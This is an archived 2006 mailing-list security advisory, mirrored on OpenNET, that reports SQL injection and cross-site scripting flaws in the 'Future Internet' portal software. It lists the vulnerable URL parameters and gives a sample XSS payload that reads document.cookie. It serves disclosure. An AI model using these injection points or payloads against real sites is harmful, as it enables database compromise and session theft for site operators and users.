The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Multiple Bugs in Future Internet ( XSS & SQL Injection )


<< Previous INDEX Search src / Print Next >> 
Date: 23 Dec 2006 15:39:01 -0000
From: [email protected]
To: [email protected]
Subject: Multiple Bugs in Future Internet ( XSS & SQL Injection )
X-Virus-Scanned: antivirus-gw at tyumen.ru

Hello 
Vulnerable : Future Internet
web : http://www.future-internet.com


SQL Injection :
http://www.example.com/path_of_script/index.cfm?fuseaction=Portal.Showpage&categoryid=311&newsId=[SQL]

http://www.example.com/path_of_script/index.cfm?fuseaction=Portal.Showpage&categoryid=[SQL]

http://www.example.com/path_of_script/index.cfm?langId=[SQL]


XSS :
http://www.example.com/path_of_script/index.cfm?fuseaction=Portal.ShowPage&categoryId=[XSS]

For example u can put :
http://www.example.com/path_of_script/index.cfm?fuseaction=Portal.ShowPage&categoryId=<script>alert(document.cookie)</script>



Discovery by Linux_Drox ( Qptan )
S-H-T
www.LeZr.Com/vb

<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру